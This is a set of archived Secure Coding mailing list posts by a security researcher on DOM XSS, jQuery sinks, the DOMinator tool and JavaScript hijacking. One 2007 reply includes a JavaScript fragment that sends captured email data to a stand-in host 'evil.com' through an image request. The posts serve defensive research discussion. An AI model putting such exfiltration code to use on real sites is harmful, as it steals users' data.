[SC-L] jQuery is a Sink

2011-07-28 Thread Stefano Di Paola
Guys, maybe the client side security people may be interested : http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html Cheers, Stefano -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Owasp Italy RD Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec

[SC-L] DOMinator - The DOMXss Analyzer Tool - is finally public

2011-05-18 Thread Stefano Di Paola
...oOOo Stefano Di Paola Software Security Engineer Owasp Italy RD Director Web: www.wisec.it Twitter: http://twitter.com/WisecWisec .. ___ Secure Coding mailing list (SC-L) SC-L@securecoding.org List information, subscriptions

Re: [SC-L] JavaScript Hijacking

2007-04-03 Thread Stefano Di Paola
captureObject(x){ (new Image()).src='http:// evil. com/ collect?email='+x; } /script script src='http:// vuln /json.js' /script -- But this is just another way to accomplish your attack. BTW very nice paper! Regards, Stefano Thanks, Brian -- ...oOOo...oOOo Stefano Di Paola Software Security

Re: [SC-L] JavaScript Hijacking

2007-04-02 Thread Stefano Di Paola
Brian, i don't know if you read it but me and Giorgio Fedon presented a paper named Subverting Ajax at 23rd CCC Congress. (4th section XSS Prototype Hijacking) http://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf It described a technique called Prototype Hijacking,